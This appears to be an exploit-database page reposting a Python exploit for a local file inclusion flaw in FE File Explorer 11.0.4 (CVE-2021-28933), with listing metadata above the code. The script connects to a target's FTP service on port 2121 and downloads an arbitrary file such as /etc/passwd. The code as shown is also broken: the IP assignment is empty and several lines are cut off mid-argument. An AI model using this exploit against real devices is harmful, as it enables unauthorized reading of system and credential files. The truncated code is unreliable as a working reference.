FE File Explorer 11.0.4 Local File Inclusion

CVE Category Price Severity
CVE-2021-28933 CWE-98 $3,000 High
Author Risk Exploitation Type Date
Administrator High Local 2022-09-07

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

FE File Explorer 11.0.4 Local File Inclusion
# Exploit Title: FE File Explorer 11.0.4 Local File inclusion
# Date: Sep 6, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage:
# Software Link:
# Version: 11.0.4
# Tested on: iPhone ios 15.6

from ftplib import FTP
import argparse

help = " FE File Explorer Local File inclusion"
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--target", help="Target IP", required=True)
parser.add_argument("--file", help="File To Open eg: etc/passwd")

args = parser.parse_args()

ip =
port = 2121 # Default Port
files = args.file

ftpConnection = FTP()
ftpConnection.connect(host=ip, port=port)

def downloadFile():

        ftpConnection.retrbinary(f"RETR {files}", open('data.txt',
        file = open('data.txt', 'r')
        print (f"[***] The contents of {files}\n")
        print (


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.